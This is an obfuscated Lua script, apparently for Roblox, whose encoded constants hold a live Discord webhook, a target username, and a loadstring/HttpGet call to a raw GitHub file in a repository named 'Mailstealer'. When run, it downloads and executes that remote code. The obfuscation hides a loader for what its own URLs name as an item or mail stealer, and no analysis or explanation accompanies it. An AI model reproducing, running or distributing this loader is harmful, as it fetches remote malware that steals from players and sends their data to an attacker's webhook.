--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 17 + 47)))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;else local v72=2^(v32-1) ;return (((v31%(v72 + v72))>=v72) and 1) or (927 -((1091 -(282 + 595)) + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1637 -(1523 + 114) ;local v35;local v36;local v37;local v38;while true do if ((1 + 0)==v34) then return (v38 * (15077001 + 377032 + 1323183)) + (v37 * 65536) + (v36 * (364 -(1065 -(892 + 65)))) + v35 ;end if (v34==(1065 -(68 + 997))) then v35,v36,v37,v38=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + (17 -13) ;v34=118 -(32 + 85) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1047 -(67 + 980) ;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39==0) then local v76=0;local v77;while true do if (v76~=0) then else v77=1474 -(1329 + 145) ;while true do if (v77==(973 -(140 + 831))) then v39=1;break;end if (v77==(1851 -(1409 + 441))) then local v118=0;while true do if (v118~=1) then else v77=2;break;end if (v118==(718 -(15 + 703))) then v42={};v43={v40,v41,nil,v42};v118=1;end end end if ((438 -(262 + 176))==v77) then local v119=1721 -(345 + 1376) ;while true do if (v119==(688 -(198 + 490))) then v40={};v41={};v119=4 -3 ;end if (v119~=1) then else v77=1;break;end end end end break;end end end if (v39~=(2 -1)) then else v44=v24();v45={};for v82=1207 -(696 + 510) ,v44 do local v83=0;local v84;local v85;local v86;while true do if (1==v83) then v86=nil;while true do if (v84==(1 -0)) then if (v85==(1263 -(1091 + 171))) then v86=v22()~=0 ;elseif (v85==2) then v86=v25();elseif (v85~=(1 + 2)) then else v86=v26();end v45[v82]=v86;break;end if (v84~=0) then else local v121=0;while true do if (v121==(0 -0)) then local v128=0 -0 ;while true do if (v128==0) then v85=v22();v86=nil;v128=1;end if (v128~=(375 -(123 + 251))) then else v121=4 -3 ;break;end end end if (v121~=1) then else v84=699 -(208 + 490) ;break;end end end end break;end if (v83==0) then v84=0 + 0 ;v85=nil;v83=1;end end end v43[3]=v22();v39=1 + 1 ;end if (v39==(838 -(660 + 176))) then for v87=1,v24() do local v88=0;local v89;local v90;while true do if (v88~=(1 + 0)) then else while true do if (v89~=(202 -(14 + 188))) then else v90=v22();if (v21(v90,1,676 -(534 + 141) )==0) then local v122=0 + 0 ;local v123;local v124;local v125;local v126;local v127;while true do if (v122~=2) then else v127=nil;while true do if (v123~=1) then else local v157=0 + 0 ;local v158;while true do if (v157~=0) then else v158=0 + 0 ;while true do if (v158==0) then local v193=0;while true do if (v193==(1 -0)) then v158=1;break;end if (v193~=(0 -0)) then else v126=nil;v127=nil;v193=2 -1 ;end end end if (v158~=(1 + 0)) then else v123=2 + 0 ;break;end end break;end end end if (v123==0) then local v159=396 -(115 + 281) ;local v160;while true do if (v159~=(0 -0)) then else v160=0 + 0 ;while true do if (v160==(2 -1)) then v123=3 -2 ;break;end if (0~=v160) then else local v194=0;while true do if (v194~=0) then else v124=0;v125=nil;v194=1;end if (1==v194) then v160=1;break;end end end end break;end end end if ((869 -(550 + 317))==v123) then while true do if (v124~=2) then else local v177=0;local v178;local v179;while true do if (v177~=0) then else v178=0 -0 ;v179=nil;v177=1 -0 ;end if (v177==(2 -1)) then while true do if (v178==0) then v179=0;while true do if (v179==(286 -(134 + 151))) then v124=1668 -(970 + 695) ;break;end if (v179==(0 -0)) then if (v21(v126,1,1)~=(1991 -(582 + 1408))) then else v127[2]=v45[v127[2]];end if (v21(v126,6 -4 ,2 -0 )==(3 -2)) then v127[3]=v45[v127[3]];end v179=1;end end break;end end break;end end end if (v124~=3) then else if (v21(v126,1827 -(1195 + 629) ,3 -0 )~=(242 -(187 + 54))) then else v127[784 -(162 + 618) ]=v45[v127[4]];end v40[v87]=v127;break;end if (v124==0) then local v181=0;local v182;local v183;while true do if (v181~=(0 + 0)) then else v182=0 + 0 ;v183=nil;v181=1;end if (v181==(1 -0)) then while true do if (v182~=0) then else v183=0 -0 ;while true do if (v183==0) then v125=v21(v90,2,1 + 2 );v126=v21(v90,4,1642 -(1373 + 263) );v183=1;end if (v183==1) then v124=1;break;end end break;end end break;end end end if (v124~=1) then else local v184=1000 -(451 + 549) ;local v185;while true do if (v184==0) then v185=0 + 0 ;while true do if (v185==1) then v124=2 -0 ;break;end if (v185==(0 -0)) then v127={v23(),v23(),nil,nil};if (v125==(0 -0)) then local v195=341 -(218 + 123) ;local v196;local v197;while true do if (v195==1) then while true do if (v196==0) then v197=1581 -(1535 + 46) ;while true do if (v197~=(0 + 0)) then else v127[3]=v23();v127[4]=v23();break;end end break;end end break;end if (v195==0) then v196=0 + 0 ;v197=nil;v195=561 -(306 + 254) ;end end elseif (v125==(1 + 0)) then v127[5 -2 ]=v24();elseif (v125==2) then v127[1470 -(899 + 568) ]=v24() -((2 + 0)^16) ;elseif (v125==(7 -4)) then local v204=0;local v205;while true do if (v204==0) then v205=603 -(268 + 335) ;while true do if (v205~=0) then else v127[3]=v24() -(2^(306 -(60 + 230))) ;v127[4]=v23();break;end end break;end end end v185=573 -(426 + 146) ;end end break;end end end end break;end end break;end if ((1 + 0)==v122) then v125=nil;v126=nil;v122=2;end if (v122==(1456 -(282 + 1174))) then v123=811 -(569 + 242) ;v124=nil;v122=2 -1 ;end end end break;end end break;end if ((0 + 0)==v88) then v89=1024 -(706 + 318) ;v90=nil;v88=1;end end end for v91=1,v24() do v41[v91-1 ]=v29();end return v43;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=1251 -(721 + 530) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==((2357 -(323 + 889)) -(466 + 679))) then v47=v24();v48=v24();v46=2 -1 ;end if (v46==(8 -5)) then if (v51==(1900 -(106 + 1794))) then if (v50==(0 + (0 -0))) then return v52 * (0 + 0) ;else local v111=1271 -(945 + (906 -(361 + 219))) ;while true do if (v111==(0 -0)) then v51=1 + 0 ;v49=(1020 -(53 + 267)) -(271 + 429) ;break;end end end elseif (v51==(1881 + 38 + 128)) then return ((v50==(114 -(4 + 110))) and (v52 * (((1914 -(15 + 398)) -(1408 + 92))/(1086 -(461 + 625))))) or (v52 * NaN) ;end return v8(v52,v51-(2311 -(993 + (1277 -(18 + 964)))) ) * (v49 + (v50/(((5378 -3949) -(41 + 1386))^(155 -(17 + 86))))) ;end if (v46==(1 + 1)) then v51=v21(v48,46 -25 ,1202 -(418 + 753) );v52=((v21(v48,198 -(71 + 51 + 44) )==(1 -0)) and  -(1 + 0)) or (1 + 0) ;v46=1 + 2 ;end if (v46==(1 + 0)) then v49=530 -(406 + 123) ;v50=(v21(v48,1,1789 -(1749 + 20) ) * ((1259 -(1043 + 214))^(8 + 24))) + v47 ;v46=1324 -(787 + 462 + 73) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then local v73=738 -(542 + 196) ;while true do if (v73==((1822 -972) -(20 + 830))) then v53=v24();if (v53==(0 + 0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -(127 -(116 + 3 + 7)) );v19=v19 + v53 ;local v55={};for v69=1 + 0 , #v54 do v55[v69]=v2(v1(v3(v54,v69,v69)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0 + 0 ;local v57;while true do if (v56==(0 + (405 -(118 + 287)))) then v57=v1(v16,v19,v19);v19=v19 + (2 -1) ;v56=2 -1 ;end if (v56==(1552 -(1126 + 425))) then return v57;end end end v23=nil;function v23()local v58=0 -0 ;local v59;local v60;while true do if (v58==(1122 -(118 + 1003))) then return (v60 * (749 -493)) + v59 ;end if ((377 -(142 + 235))==v58) then v59,v60=v1(v16,v19,v19 + ((16 -7) -7) );v19=v19 + 1 + 1 ;v58=978 -(553 + 374 + 50) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v61,1,1));return "";end end else local v75=v2(v0(v61,16));if v20 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v75,v20);v20=nil;v93=1;end end else return v75;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (1==v65) then v68=v62[3];return function(...)local v95=v66;local v96=v67;local v97=v68;local v98=v28;local v99=1;local v100= -1;local v101={};local v102={...};local v103=v12("#",...) -1 ;local v104={};local v105={};for v109=0,v103 do if (v109>=v97) then v101[v109-v97 ]=v102[v109 + 1 ];else v105[v109]=v102[v109 + 1 ];end end local v106=(v103-v97) + 1 ;local v107;local v108;while true do local v110=0;while true do if (v110==1) then if (v108<=9) then if (v108<=4) then if (v108<=1) then if (v108==0) then v99=v107[3];else v64[v107[3]]=v105[v107[2]];end elseif (v108<=2) then v105[v107[2]]();elseif (v108>3) then local v161=0;local v162;local v163;while true do if (v161==1) then v105[v162 + 1 ]=v163;v105[v162]=v163[v107[4]];break;end if (v161==0) then v162=v107[2];v163=v105[v107[3]];v161=1;end end else do return;end end elseif (v108<=6) then if (v108==5) then local v132=v107[2];v105[v132]=v105[v132](v13(v105,v132 + 1 ,v100));else local v134=0;local v135;local v136;local v137;local v138;while true do if (2==v134) then for v173=v135,v100 do v138=v138 + 1 ;v105[v173]=v136[v138];end break;end if (v134==1) then v100=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==0) then v135=v107[2];v136,v137=v98(v105[v135](v13(v105,v135 + 1 ,v107[3])));v134=1;end end end elseif (v108<=7) then if (v105[v107[2]]==v107[4]) then v99=v99 + 1 ;else v99=v107[3];end elseif (v108==8) then do return;end else v99=v107[3];end elseif (v108<=14) then if (v108<=11) then if (v108>10) then local v139=v107[2];local v140,v141=v98(v105[v139](v13(v105,v139 + 1 ,v107[3])));v100=(v141 + v139) -1 ;local v142=0;for v154=v139,v100 do v142=v142 + 1 ;v105[v154]=v140[v142];end else local v143=v107[2];local v144=v105[v107[3]];v105[v143 + 1 ]=v144;v105[v143]=v144[v107[4]];end elseif (v108<=12) then v105[v107[2]]=v64[v107[3]];elseif (v108==13) then v105[v107[2]]=v64[v107[3]];else v64[v107[3]]=v105[v107[2]];end elseif (v108<=16) then if (v108>15) then v105[v107[2]]=v107[3];else local v152=v107[2];v105[v152]=v105[v152](v13(v105,v152 + 1 ,v100));end elseif (v108<=17) then v105[v107[2]]();elseif (v108==18) then if (v105[v107[2]]==v107[4]) then v99=v99 + 1 ;else v99=v107[3];end else v105[v107[2]]=v107[3];end v99=v99 + 1 ;break;end if (v110==0) then v107=v95[v99];v108=v107[1];v110=1;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O006461696E656C6D6F6C6F6C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313335322O3433363033393736332O3539342F6755667233347A4132304A68706D4A344B544A792O61737A5A554454784176374355366B3658314445327657506B39375F5768663770513452746F5431394D426338734A00163O0012133O00013O0026123O000D0001000200044O000D0001001213000100043O00120E000100033O00120D000100053O00120D000200063O002004000200020007001213000400084O0006000200044O000F00013O00022O000200010001000100044O001500010026123O00010001000100044O00010001001213000100043O00120E000100093O0012130001000B3O00120E0001000A3O0012133O00023O00044O000100012O00083O00017O00",v9(),...);
